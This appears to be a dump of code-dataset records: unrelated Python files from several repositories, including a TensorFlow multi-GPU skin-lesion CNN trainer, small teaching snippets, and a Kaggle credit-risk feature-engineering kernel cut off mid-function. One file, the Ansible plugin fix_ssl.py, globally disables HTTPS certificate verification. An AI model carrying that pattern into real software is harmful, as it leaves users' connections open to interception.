    # Fixed stray "x`" that was accidentally left in the message text.
    print(name + ' is my pet.')
|
[
"karthik.kasala@gmail.com"
] |
karthik.kasala@gmail.com
|
de7e14bb4a48b4fa23f12d9b6ee34dd226ad6ecb
|
843af55f35c54d85bf6006ccf16c79d9a5451285
|
/25 - more_lists.py
|
8af52312523c5eb4245f871af28a73e7de55b267
|
[] |
no_license
|
estebantoso/curso_python_udemy
|
2a5989351921d54394b61df1e8089c58088a01cc
|
0f4deba3b0efbc59159aaeb49ffd95c6724c2dd2
|
refs/heads/master
| 2020-05-22T19:00:36.599701
| 2019-05-23T14:49:31
| 2019-05-23T14:49:31
| 186,485,180
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 87
|
py
|
# Demo of list indexing and membership testing.
friends = ["A", "B", "C"]
first, last = friends[0], friends[-1]
print(first)
print(last)
print("A" in friends)
|
[
"estebantoso@gmail.com"
] |
estebantoso@gmail.com
|
862a41c8dfac8339006c6b0313a9a71788c0ef52
|
1fcb40f1f2a2c6b4f5ab6c612b900c7eb9517502
|
/tf-tutorials/multigpu/multi_gpu_cnn.py
|
1954bcca56e4a3d6e52d3c5b5927bba9e28deb39
|
[] |
no_license
|
prativa/ai-artist
|
3466b7b160180d207c94429fbec2bd33b0da53c8
|
ee98af787233889ed92cc84ce66104e3f7f6e84a
|
refs/heads/master
| 2020-04-15T19:11:45.467297
| 2018-11-29T20:22:48
| 2018-11-29T20:22:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,137
|
py
|
import tensorflow as tf
import os
import numpy as np
import math
from classification.skin import data_loader
import time
import random
from sklearn import metrics
# Model / training hyper-parameters for the skin-lesion classifier.
_IMAGE_SIZE = 224  # input images are square, 224x224
_IMAGE_CHANNELS = 3  # RGB
_NUM_CLASSES = 2  # binary classification (melanoma vs. benign)
_BATCH_SIZE = 50 # this batch size will be for each gpu, if multi gpu setup used it will consume batch_size * gpu nums in every iteration.
_EPOCHS = 1000
learning_rate = 0.0001
gpu_nums=2  # number of GPU towers
_BATCH_SIZE_VALID = 75  # batch size intended for validation passes
_SAVE_PATH = "./tensorboard/isic-classification-task1/"  # TensorBoard/checkpoint output dir
def core_model(input_img, y, num_classes):
    """Build the 5-conv / 2-FC CNN tower for one GPU.

    Args:
        input_img: flattened image batch; reshaped internally to
            (-1, _IMAGE_SIZE, _IMAGE_SIZE, _IMAGE_CHANNELS).
        y: labels placeholder (currently unused inside the tower).
        num_classes: number of output classes.
            NOTE(review): the output layer is sized with the module-level
            _NUM_CLASSES rather than this argument — confirm they always
            agree before relying on the parameter.

    Returns:
        (softmax_linear, y_pred_cls): un-normalised per-class scores and
        the argmax class prediction.

    Weight/bias creation uses the module-level variable_with_weight_decay
    and variable_on_cpu helpers (previously duplicated here as identical
    nested functions; the duplicates were removed for consistency).
    """
    x_image = tf.reshape(input_img, [-1, _IMAGE_SIZE, _IMAGE_SIZE, _IMAGE_CHANNELS], name='images')
    with tf.variable_scope('conv1') as scope:
        kernel = variable_with_weight_decay('weights', shape=[5, 5, 3, 64], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(x_image, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [64], tf.constant_initializer(0.0))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv1 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv1', conv1)
        tf.summary.scalar('Convolution_layers/conv1', tf.nn.zero_fraction(conv1))
    # Local response normalisation + 2x downsampling after conv1.
    norm1 = tf.nn.lrn(conv1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm1')
    pool1 = tf.nn.max_pool(norm1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
    with tf.variable_scope('conv2') as scope:
        kernel = variable_with_weight_decay('weights', shape=[5, 5, 64, 64], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [64], tf.constant_initializer(0.1))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv2 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv2', conv2)
        tf.summary.scalar('Convolution_layers/conv2', tf.nn.zero_fraction(conv2))
    norm2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm2')
    pool2 = tf.nn.max_pool(norm2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool2')
    # Three back-to-back 3x3 conv layers without pooling in between.
    with tf.variable_scope('conv3') as scope:
        kernel = variable_with_weight_decay('weights', shape=[3, 3, 64, 128], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv3 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv3', conv3)
        tf.summary.scalar('Convolution_layers/conv3', tf.nn.zero_fraction(conv3))
    with tf.variable_scope('conv4') as scope:
        kernel = variable_with_weight_decay('weights', shape=[3, 3, 128, 128], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(conv3, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv4 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv4', conv4)
        tf.summary.scalar('Convolution_layers/conv4', tf.nn.zero_fraction(conv4))
    with tf.variable_scope('conv5') as scope:
        kernel = variable_with_weight_decay('weights', shape=[3, 3, 128, 128], stddev=5e-2, wd=0.0)
        conv = tf.nn.conv2d(conv4, kernel, [1, 1, 1, 1], padding='SAME')
        biases = variable_on_cpu('biases', [128], tf.constant_initializer(0.0))
        pre_activation = tf.nn.bias_add(conv, biases)
        conv5 = tf.nn.relu(pre_activation, name=scope.name)
        tf.summary.histogram('Convolution_layers/conv5', conv5)
        tf.summary.scalar('Convolution_layers/conv5', tf.nn.zero_fraction(conv5))
    norm3 = tf.nn.lrn(conv5, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='norm3')
    pool3 = tf.nn.max_pool(norm3, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool3')
    # Classifier head: two fully-connected layers with L2 weight decay.
    with tf.variable_scope('fully_connected1') as scope:
        reshape = tf.layers.flatten(pool3)
        dim = reshape.get_shape()[1].value
        weights = variable_with_weight_decay('weights', shape=[dim, 384], stddev=0.04, wd=0.004)
        biases = variable_on_cpu('biases', [384], tf.constant_initializer(0.1))
        local3 = tf.nn.relu(tf.matmul(reshape, weights) + biases, name=scope.name)
        tf.summary.histogram('Fully connected layers/fc1', local3)
        tf.summary.scalar('Fully connected layers/fc1', tf.nn.zero_fraction(local3))
    with tf.variable_scope('fully_connected2') as scope:
        weights = variable_with_weight_decay('weights', shape=[384, 192], stddev=0.04, wd=0.004)
        biases = variable_on_cpu('biases', [192], tf.constant_initializer(0.1))
        local4 = tf.nn.relu(tf.matmul(local3, weights) + biases, name=scope.name)
        tf.summary.histogram('Fully connected layers/fc2', local4)
        tf.summary.scalar('Fully connected layers/fc2', tf.nn.zero_fraction(local4))
    with tf.variable_scope('output') as scope:
        weights = variable_with_weight_decay('weights', [192, _NUM_CLASSES], stddev=1 / 192.0, wd=0.0)
        biases = variable_on_cpu('biases', [_NUM_CLASSES], tf.constant_initializer(0.0))
        softmax_linear = tf.add(tf.matmul(local4, weights), biases, name=scope.name)
        tf.summary.histogram('Fully connected layers/output', softmax_linear)
    y_pred_cls = tf.argmax(softmax_linear, axis=1)
    return softmax_linear, y_pred_cls
def variable_with_weight_decay(name, shape, stddev, wd):
    """Create a CPU-resident variable with truncated-normal initialisation.

    When *wd* is not None, an L2 penalty (``wd * l2_loss(var)``) is added
    to the 'losses' graph collection so it is picked up by the total loss.
    """
    var = variable_on_cpu(
        name, shape,
        tf.truncated_normal_initializer(stddev=stddev, dtype=tf.float32))
    if wd is not None:
        tf.add_to_collection(
            'losses', tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss'))
    return var
def variable_on_cpu(name, shape, initializer):
    """Create or fetch a float32 variable pinned to CPU memory.

    Pinning to '/cpu:0' lets the variable be shared by all GPU towers.
    """
    with tf.device('/cpu:0'):
        return tf.get_variable(name, shape, initializer=initializer, dtype=tf.float32)
def average_gradients(tower_grads):
    """Average gradients across GPU towers.

    *tower_grads* is a list (one entry per tower) of lists of
    (gradient, variable) pairs.  Returns a single list of pairs whose
    gradient is the element-wise mean over towers.  The variables are
    shared between towers, so each averaged gradient is paired with the
    first tower's variable pointer.
    """
    averaged = []
    # zip(*tower_grads) groups the same variable's gradient from every tower.
    for pairs in zip(*tower_grads):
        stacked = tf.concat(axis=0,
                            values=[tf.expand_dims(g, 0) for g, _ in pairs])
        mean_grad = tf.reduce_mean(stacked, 0)
        shared_var = pairs[0][1]
        averaged.append((mean_grad, shared_var))
    return averaged
def predict_valid(show_confusion_matrix=False):
    '''
    Evaluate the current model on the whole validation set.

    Runs batched inference over the validation images, then prints overall
    accuracy, a per-class confusion matrix, ROC-AUC, F1 score and average
    precision.

    NOTE(review): relies on module-level globals defined further down this
    file (`loader`, `sess`, `num_iterations`, `_BATCH_SIZE`, `_NUM_CLASSES`);
    the `show_confusion_matrix` flag is currently unused.
    '''
    # Fresh placeholders for inference (separate from the training feeds).
    images_valid = tf.placeholder(tf.float32, shape=[None , 224*224*3])
    labels_valid = tf.placeholder(tf.float32, shape=[None , 2])
    valid_x, valid_y, valid_l = loader.getValidationDataForClassificationMelanoma()
    valid_count = len(valid_x)
    # Shuffle the validation set; order does not affect the metrics below.
    shuffle_order = [i for i in range(valid_count)]
    random.shuffle(shuffle_order)
    # print(shuffle_order)
    print("iterations {}".format(num_iterations))
    valid_x = valid_x[shuffle_order].reshape(valid_count, -1)
    valid_y = valid_y[shuffle_order].reshape(valid_count, -1)
    i = 0
    # NOTE(review): np.int is removed in NumPy >= 1.24; use int/np.int64 there.
    y_pred = np.zeros(shape=len(valid_x), dtype=np.int)
    # Builds a new tower over the placeholders above; presumably variable
    # reuse is already active in the calling graph -- confirm at call site.
    output, y_pred_class = core_model(images_valid, labels_valid, _NUM_CLASSES)
    # Batched inference over the whole validation set.
    while i < len(valid_x):
        j = min(i + _BATCH_SIZE, len(valid_x))
        batch_xs = valid_x[i:j, :]
        batch_ys = valid_y[i:j, :]
        y_pred[i:j] = sess.run(y_pred_class, feed_dict={images_valid: batch_xs, labels_valid: batch_ys})
        i = j
    correct = (np.argmax(valid_y, axis=1) == y_pred)
    acc = correct.mean() * 100
    correct_numbers = correct.sum()
    print("Accuracy on Valid-Set: {0:.2f}% ({1} / {2})".format(acc, correct_numbers, len(valid_x)))
    y_true = np.argmax(valid_y, axis=1)
    # Confusion matrix, printed one row per true class with its label.
    cm = metrics.confusion_matrix(y_true=y_true, y_pred=y_pred)
    for i in range(_NUM_CLASSES):
        class_name = "({}) {}".format(i, valid_l[i])
        print(cm[i, :], class_name)
    class_numbers = [" ({0})".format(i) for i in range(_NUM_CLASSES)]
    print("".join(class_numbers))
    # Ranking / threshold metrics on the hard predictions.
    auc = metrics.roc_auc_score(y_true, y_pred)
    print("Auc on Valid Set: {}".format(auc))
    f1_score = metrics.f1_score(y_true, y_pred)
    print("F1 score: {}".format(f1_score))
    average_precision = metrics.average_precision_score(y_true, y_pred)
    print("average precsion on valid: {}".format(average_precision))
    # Per-class FP/FN/TP/TN derived from the confusion matrix
    # (computed but currently unused).
    FP = cm.sum(axis=0) - np.diag(cm)
    FN = cm.sum(axis=1) - np.diag(cm)
    TP = np.diag(cm)
    TN = cm.sum() - (FP + FN + TP)
    return
tf.reset_default_graph()
with tf.Graph().as_default(), tf.device('/cpu:0'):
    # ------------------------------------------------------------------
    # Data: the full training set is loaded into host memory up front.
    # ------------------------------------------------------------------
    loader = data_loader.DataReaderISIC2017(_BATCH_SIZE, _EPOCHS, gpu_nums)
    train_x, train_y, train_l = loader.getTrainDataForClassificationMelanoma()
    num_iterations = loader.iterations
    print("Iterations {}".format(num_iterations))
    total_count = loader.total_train_count
    step_local = int(math.ceil(_EPOCHS * total_count / _BATCH_SIZE))
    global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
    optimizer = tf.train.GradientDescentOptimizer(learning_rate)
    images = tf.placeholder(tf.float32, shape=[None, 224*224*3])
    labels = tf.placeholder(tf.float32, shape=[None, 2])
    # Per-GPU slice size; fed with _BATCH_SIZE for training batches and
    # _BATCH_SIZE_VALID for validation batches.
    batch_size_gpu = tf.placeholder(tf.int32)

    # ------------------------------------------------------------------
    # Model: one replica ("tower") per GPU, sharing weights via reuse.
    # ------------------------------------------------------------------
    tower_grads = []
    losses = []
    y_pred_classes = []
    for i in range(gpu_nums):
        with tf.device('/gpu:{}'.format(i)):
            with tf.name_scope("tower_{}".format(i)) as scope:
                # Each tower consumes its own contiguous slice of the batch.
                per_gpu_count = batch_size_gpu
                start = i * per_gpu_count
                end = start + per_gpu_count
                output, y_pred_class = core_model(images[start:end, :], labels[start:end, :], _NUM_CLASSES)
                loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=labels[start:end, :]))
                losses.append(loss)
                # Reuse variables for the towers built after this one.
                tf.get_variable_scope().reuse_variables()
                grads = optimizer.compute_gradients(loss)
                tower_grads.append(grads)
                y_pred_classes.append(y_pred_class)

    # Synchronization point: average per-tower gradients, apply them once.
    grads = average_gradients(tower_grads)
    apply_gradient_op = optimizer.apply_gradients(grads, global_step=global_step)
    losses_mean = tf.reduce_mean(losses)
    # Concatenate every tower's class predictions back into one batch-sized vector.
    y_pred_classes_op = tf.reshape(tf.stack(y_pred_classes, axis=0), [-1])
    correct_prediction = tf.equal(y_pred_classes_op, tf.argmax(labels, axis=1))
    batch_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    # NOTE(review): an exponential moving average of the weights used to be
    # grouped into train_op here; re-add tf.train.ExponentialMovingAverage
    # if weight averaging is wanted.
    train_op = apply_gradient_op

    # ------------------------------------------------------------------
    # Session / checkpointing. allow_soft_placement is required so ops
    # without a GPU kernel fall back to the CPU.
    # ------------------------------------------------------------------
    start = time.time()
    saver = tf.train.Saver()
    sess = tf.Session(config=tf.ConfigProto(
        allow_soft_placement=True,
        log_device_placement=True))
    train_writer = tf.summary.FileWriter(_SAVE_PATH, sess.graph)
    try:
        print("Trying to restore last checkpoint ...")
        last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=_SAVE_PATH)
        saver.restore(sess, save_path=last_chk_path)
        print("Restored checkpoint from:", last_chk_path)
    except Exception:
        # No (usable) checkpoint: start from freshly initialized variables.
        print("Failed to restore checkpoint. Initializing variables instead.")
        sess.run(tf.global_variables_initializer())

    # Resume bookkeeping: how many steps / epochs are already done.
    step_global = sess.run(global_step)
    step_local = int(math.ceil(_EPOCHS * total_count / _BATCH_SIZE))
    # NOTE(review): dividing by _BATCH_SIZE assumes one epoch equals
    # _BATCH_SIZE optimizer steps -- confirm against the checkpoint scheme.
    epoch_done = int(math.ceil(step_global / (_BATCH_SIZE)))
    print("global:{}, local: {}, epochs done {}".format(step_global, step_local, epoch_done))
    if step_local < step_global:
        print("Training steps completed: global: {}, local: {}".format(step_global, step_local))
        exit()

    # ------------------------------------------------------------------
    # Training loop.
    # ------------------------------------------------------------------
    for epoch in range(epoch_done, _EPOCHS):
        # Reshuffle the whole training set each epoch (all data is in memory).
        shuffle_order = [i for i in range(total_count)]
        random.shuffle(shuffle_order)
        print("iterations {}".format(num_iterations))
        train_x = train_x[shuffle_order].reshape(total_count, -1)
        train_y = train_y[shuffle_order].reshape(total_count, -1)
        # NOTE(review): lastEpoch is reset every epoch, so the validation
        # branch below fires on every iteration i > 0 once epoch > 0 --
        # confirm whether once-per-epoch validation was intended.
        lastEpoch = 0
        for i in range(num_iterations):
            startIndex = _BATCH_SIZE * i * gpu_nums
            endIndex = min(startIndex + _BATCH_SIZE * gpu_nums, total_count)
            batch_xs = train_x[startIndex:endIndex, :]
            batch_ys = train_y[startIndex:endIndex, :]
            _, step_global_out, loss_out, batch_accuracy_out = sess.run(
                [train_op, global_step, losses_mean, batch_accuracy],
                feed_dict={batch_size_gpu: _BATCH_SIZE, images: batch_xs, labels: batch_ys})
            if i != 0 and epoch != lastEpoch:
                lastEpoch = epoch
                valid_x, valid_y, valid_l = loader.getValidationDataForClassificationMelanoma()
                total_count_valid = len(valid_x)
                startIndex = 0
                endIndex = min(startIndex + _BATCH_SIZE_VALID * gpu_nums, total_count_valid)
                step_global_out, batch_accuracy_valid_out = sess.run(
                    [global_step, batch_accuracy],
                    feed_dict={batch_size_gpu: _BATCH_SIZE_VALID, images: valid_x, labels: valid_y})
                # BUG FIX: report the validation accuracy; this previously
                # printed the last *training* batch accuracy.
                print("valid epoch: {}, iteration: {}, Accuracy: {}".format(epoch, i, batch_accuracy_valid_out))
|
[
"milton.2002@yahoo.com"
] |
milton.2002@yahoo.com
|
491dc44ae36dbbbd2a8115d6c4c80ac79186d685
|
5ec09f479c7a680f77d2b8e5da675e24daf82da7
|
/callback_plugins/fix_ssl.py
|
330fc989837e7a72fe813929f80bb61a65438884
|
[] |
no_license
|
tbuchi888/vagrant-yaml-ansible
|
1f2d3bcb5d35d3d1e72c1cda2730bc761d33e812
|
0837e62a3a835d94cb9200160548034f26e3a991
|
refs/heads/master
| 2021-01-10T02:52:51.389484
| 2016-03-19T16:05:58
| 2016-03-19T16:05:58
| 54,269,456
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 215
|
py
|
import ssl

# Globally disable HTTPS certificate verification (PEP 476 opt-out) by
# swapping the default context factory for the unverified one -- but only on
# interpreters that expose both private hooks.
if all(hasattr(ssl, attr) for attr in
       ('_create_default_https_context', '_create_unverified_context')):
    ssl._create_default_https_context = ssl._create_unverified_context
class CallbackModule(object):
    """Empty Ansible callback plugin class.

    Its presence makes this file loadable as a callback plugin; the actual
    work happens at import time (the ssl monkeypatch above).
    """
    pass
|
[
"tbuchi888@users.noreplay.github.com"
] |
tbuchi888@users.noreplay.github.com
|
41a86538fd422e72ba79da31cd965f050d59b26c
|
9e27cc85675ec764a62764decdc85d6b57a10be3
|
/kaggle_kernel.py
|
63533471d892f754944895ad665a85aa841ca8ee
|
[] |
no_license
|
jsamaitis/Home-Credit-Default-Risk-2018
|
07886e3992301ca8e855773d615a41eecf647b5d
|
26d690eabe137d210e963b2daf36d03adfc057d4
|
refs/heads/master
| 2020-03-24T21:13:48.635974
| 2018-08-13T08:13:26
| 2018-08-13T08:13:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,043
|
py
|
# HOME CREDIT DEFAULT RISK COMPETITION
# Most features are created by applying min, max, mean, sum and var functions to grouped tables.
# Little feature selection is done and overfitting might be a problem since many features are related.
# The following key ideas were used:
# - Divide or subtract important features to get rates (like annuity and income)
# - In Bureau Data: create specific features for Active credits and Closed credits
# - In Previous Applications: create specific features for Approved and Refused applications
# - Modularity: one function for each table (except bureau_balance and application_test)
# - One-hot encoding for categorical features
# All tables are joined with the application DF using the SK_ID_CURR key (except bureau_balance).
# You can use LightGBM with KFold or Stratified KFold. Please upvote if you find it useful, thanks!
# Update 16/06/2018:
# - Added Payment Rate feature
# - Removed index from features
# - Set early stopping to 200 rounds
# - Use standard KFold CV (not stratified)
# Public LB increased to 0.792
import numpy as np
import pandas as pd
import gc
import time
from contextlib import contextmanager
from lightgbm import LGBMClassifier
from sklearn.metrics import roc_auc_score, roc_curve
from sklearn.model_selection import KFold, StratifiedKFold
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
@contextmanager
def timer(title):
    """Print the elapsed wall-clock time of the wrapped block as '<title> - done in Ns'."""
    started = time.time()
    yield
    elapsed = time.time() - started
    print("{} - done in {:.0f}s".format(title, elapsed))
# One-hot encoding for categorical columns with get_dummies
def one_hot_encoder(df, nan_as_category = True):
    """One-hot encode every object-dtype column of *df* with pd.get_dummies.

    Returns the transformed frame and the list of newly created column names.
    """
    before = set(df.columns)
    object_cols = [c for c in df.columns if df[c].dtype == 'object']
    df = pd.get_dummies(df, columns=object_cols, dummy_na=nan_as_category)
    added = [c for c in df.columns if c not in before]
    return df, added
# Preprocess application_train.csv and application_test.csv
def application_train_test(num_rows = None, nan_as_category = False):
    """Load application_{train,test}.csv, merge them and engineer basic features.

    Test rows keep a null TARGET so they can be split off again later.
    """
    train = pd.read_csv('data/application_train.csv', nrows= num_rows)
    test = pd.read_csv('data/application_test.csv', nrows= num_rows)
    print("Train samples: {}, test samples: {}".format(len(train), len(test)))
    df = train.append(test).reset_index()
    # Drop the handful of applications with an unknown gender code.
    df = df[df['CODE_GENDER'] != 'XNA']
    # Two-valued categoricals become integer codes.
    for bin_feature in ('CODE_GENDER', 'FLAG_OWN_CAR', 'FLAG_OWN_REALTY'):
        df[bin_feature], _ = pd.factorize(df[bin_feature])
    # Remaining categoricals become one-hot columns.
    df, _ = one_hot_encoder(df, nan_as_category)
    # 365243 is the dataset's sentinel for a missing employment duration.
    df['DAYS_EMPLOYED'].replace(365243, np.nan, inplace= True)
    # Simple ratio features.
    df['DAYS_EMPLOYED_PERC'] = df['DAYS_EMPLOYED'] / df['DAYS_BIRTH']
    df['INCOME_CREDIT_PERC'] = df['AMT_INCOME_TOTAL'] / df['AMT_CREDIT']
    df['INCOME_PER_PERSON'] = df['AMT_INCOME_TOTAL'] / df['CNT_FAM_MEMBERS']
    df['ANNUITY_INCOME_PERC'] = df['AMT_ANNUITY'] / df['AMT_INCOME_TOTAL']
    df['PAYMENT_RATE'] = df['AMT_ANNUITY'] / df['AMT_CREDIT']
    del test
    gc.collect()
    return df
# Preprocess bureau.csv and bureau_balance.csv
def bureau_and_balance(num_rows = None, nan_as_category = True):
    """Aggregate bureau.csv (+ bureau_balance.csv) per client (SK_ID_CURR).

    bureau_balance is first aggregated per bureau credit (SK_ID_BUREAU) and
    joined onto bureau; the result is then aggregated per client, with extra
    ACTIVE_* / CLOSED_* numeric aggregates restricted to active and closed
    credits respectively.
    """
    bureau = pd.read_csv('data/bureau.csv', nrows = num_rows)
    bb = pd.read_csv('data/bureau_balance.csv', nrows = num_rows)
    bb, bb_cat = one_hot_encoder(bb, nan_as_category)
    bureau, bureau_cat = one_hot_encoder(bureau, nan_as_category)
    # Bureau balance: Perform aggregations and merge with bureau.csv
    bb_aggregations = {'MONTHS_BALANCE': ['min', 'max', 'size']}
    for col in bb_cat:
        bb_aggregations[col] = ['mean']
    bb_agg = bb.groupby('SK_ID_BUREAU').agg(bb_aggregations)
    # Flatten the (column, stat) MultiIndex to COLUMN_STAT names.
    bb_agg.columns = pd.Index([e[0] + "_" + e[1].upper() for e in bb_agg.columns.tolist()])
    bureau = bureau.join(bb_agg, how='left', on='SK_ID_BUREAU')
    bureau.drop(['SK_ID_BUREAU'], axis=1, inplace= True)
    del bb, bb_agg
    gc.collect()
    # Bureau and bureau_balance numeric features
    num_aggregations = {
        'DAYS_CREDIT': ['min', 'max', 'mean', 'var'],
        'DAYS_CREDIT_ENDDATE': ['min', 'max', 'mean'],
        'DAYS_CREDIT_UPDATE': ['mean'],
        'CREDIT_DAY_OVERDUE': ['max', 'mean'],
        'AMT_CREDIT_MAX_OVERDUE': ['mean'],
        'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],
        'AMT_CREDIT_SUM_DEBT': ['max', 'mean', 'sum'],
        'AMT_CREDIT_SUM_OVERDUE': ['mean'],
        'AMT_CREDIT_SUM_LIMIT': ['mean', 'sum'],
        'AMT_ANNUITY': ['max', 'mean'],
        'CNT_CREDIT_PROLONG': ['sum'],
        'MONTHS_BALANCE_MIN': ['min'],
        'MONTHS_BALANCE_MAX': ['max'],
        'MONTHS_BALANCE_SIZE': ['mean', 'sum']
    }
    # Bureau and bureau_balance categorical features
    cat_aggregations = {}
    for cat in bureau_cat: cat_aggregations[cat] = ['mean']
    # bureau_balance one-hot columns arrive with a _MEAN suffix from bb_agg.
    for cat in bb_cat: cat_aggregations[cat + "_MEAN"] = ['mean']
    bureau_agg = bureau.groupby('SK_ID_CURR').agg({**num_aggregations, **cat_aggregations})
    bureau_agg.columns = pd.Index(['BURO_' + e[0] + "_" + e[1].upper() for e in bureau_agg.columns.tolist()])
    # Bureau: Active credits - using only numerical aggregations
    active = bureau[bureau['CREDIT_ACTIVE_Active'] == 1]
    active_agg = active.groupby('SK_ID_CURR').agg(num_aggregations)
    active_agg.columns = pd.Index(['ACTIVE_' + e[0] + "_" + e[1].upper() for e in active_agg.columns.tolist()])
    bureau_agg = bureau_agg.join(active_agg, how='left', on='SK_ID_CURR')
    del active, active_agg
    gc.collect()
    # Bureau: Closed credits - using only numerical aggregations
    closed = bureau[bureau['CREDIT_ACTIVE_Closed'] == 1]
    closed_agg = closed.groupby('SK_ID_CURR').agg(num_aggregations)
    closed_agg.columns = pd.Index(['CLOSED_' + e[0] + "_" + e[1].upper() for e in closed_agg.columns.tolist()])
    bureau_agg = bureau_agg.join(closed_agg, how='left', on='SK_ID_CURR')
    del closed, closed_agg, bureau
    gc.collect()
    return bureau_agg
# Preprocess previous_applications.csv
def previous_applications(num_rows = None, nan_as_category = True):
    """Aggregate previous_application.csv per client (SK_ID_CURR).

    Produces PREV_* aggregates over all previous applications, plus
    APPROVED_* / REFUSED_* numeric aggregates restricted to approved and
    refused applications respectively.
    """
    prev = pd.read_csv('data/previous_application.csv', nrows = num_rows)
    prev, cat_cols = one_hot_encoder(prev, nan_as_category= True)
    # Days 365.243 values -> nan
    # (365243 is the dataset's sentinel for a missing day count.)
    prev['DAYS_FIRST_DRAWING'].replace(365243, np.nan, inplace= True)
    prev['DAYS_FIRST_DUE'].replace(365243, np.nan, inplace= True)
    prev['DAYS_LAST_DUE_1ST_VERSION'].replace(365243, np.nan, inplace= True)
    prev['DAYS_LAST_DUE'].replace(365243, np.nan, inplace= True)
    prev['DAYS_TERMINATION'].replace(365243, np.nan, inplace= True)
    # Add feature: value ask / value received percentage
    prev['APP_CREDIT_PERC'] = prev['AMT_APPLICATION'] / prev['AMT_CREDIT']
    # Previous applications numeric features
    num_aggregations = {
        'AMT_ANNUITY': ['min', 'max', 'mean'],
        'AMT_APPLICATION': ['min', 'max', 'mean'],
        'AMT_CREDIT': ['min', 'max', 'mean'],
        'APP_CREDIT_PERC': ['min', 'max', 'mean', 'var'],
        'AMT_DOWN_PAYMENT': ['min', 'max', 'mean'],
        'AMT_GOODS_PRICE': ['min', 'max', 'mean'],
        'HOUR_APPR_PROCESS_START': ['min', 'max', 'mean'],
        'RATE_DOWN_PAYMENT': ['min', 'max', 'mean'],
        'DAYS_DECISION': ['min', 'max', 'mean'],
        'CNT_PAYMENT': ['mean', 'sum'],
    }
    # Previous applications categorical features
    cat_aggregations = {}
    for cat in cat_cols:
        cat_aggregations[cat] = ['mean']
    prev_agg = prev.groupby('SK_ID_CURR').agg({**num_aggregations, **cat_aggregations})
    # Flatten the (column, stat) MultiIndex to PREV_COLUMN_STAT names.
    prev_agg.columns = pd.Index(['PREV_' + e[0] + "_" + e[1].upper() for e in prev_agg.columns.tolist()])
    # Previous Applications: Approved Applications - only numerical features
    approved = prev[prev['NAME_CONTRACT_STATUS_Approved'] == 1]
    approved_agg = approved.groupby('SK_ID_CURR').agg(num_aggregations)
    approved_agg.columns = pd.Index(['APPROVED_' + e[0] + "_" + e[1].upper() for e in approved_agg.columns.tolist()])
    prev_agg = prev_agg.join(approved_agg, how='left', on='SK_ID_CURR')
    # Previous Applications: Refused Applications - only numerical features
    refused = prev[prev['NAME_CONTRACT_STATUS_Refused'] == 1]
    refused_agg = refused.groupby('SK_ID_CURR').agg(num_aggregations)
    refused_agg.columns = pd.Index(['REFUSED_' + e[0] + "_" + e[1].upper() for e in refused_agg.columns.tolist()])
    prev_agg = prev_agg.join(refused_agg, how='left', on='SK_ID_CURR')
    del refused, refused_agg, approved, approved_agg, prev
    gc.collect()
    return prev_agg
# Preprocess POS_CASH_balance.csv
def pos_cash(num_rows = None, nan_as_category = True):
    """Aggregate POS_CASH_balance.csv per client (SK_ID_CURR)."""
    pos = pd.read_csv('data/POS_CASH_balance.csv', nrows= num_rows)
    pos, cat_cols = one_hot_encoder(pos, nan_as_category= True)
    # Numeric aggregations, plus the mean of every one-hot category column.
    aggregations = {
        'MONTHS_BALANCE': ['max', 'mean', 'size'],
        'SK_DPD': ['max', 'mean'],
        'SK_DPD_DEF': ['max', 'mean'],
    }
    aggregations.update({cat: ['mean'] for cat in cat_cols})
    agg = pos.groupby('SK_ID_CURR').agg(aggregations)
    # Flatten the (column, stat) MultiIndex to POS_COLUMN_STAT names.
    agg.columns = pd.Index(['POS_' + col + "_" + stat.upper() for col, stat in agg.columns.tolist()])
    # Number of POS cash records per client.
    agg['POS_COUNT'] = pos.groupby('SK_ID_CURR').size()
    del pos
    gc.collect()
    return agg
# Preprocess installments_payments.csv
def installments_payments(num_rows = None, nan_as_category = True):
    """Aggregate installments_payments.csv per client (SK_ID_CURR)."""
    ins = pd.read_csv('data/installments_payments.csv', nrows= num_rows)
    ins, cat_cols = one_hot_encoder(ins, nan_as_category= True)
    # Ratio / difference between the installment due and the amount paid.
    ins['PAYMENT_PERC'] = ins['AMT_PAYMENT'] / ins['AMT_INSTALMENT']
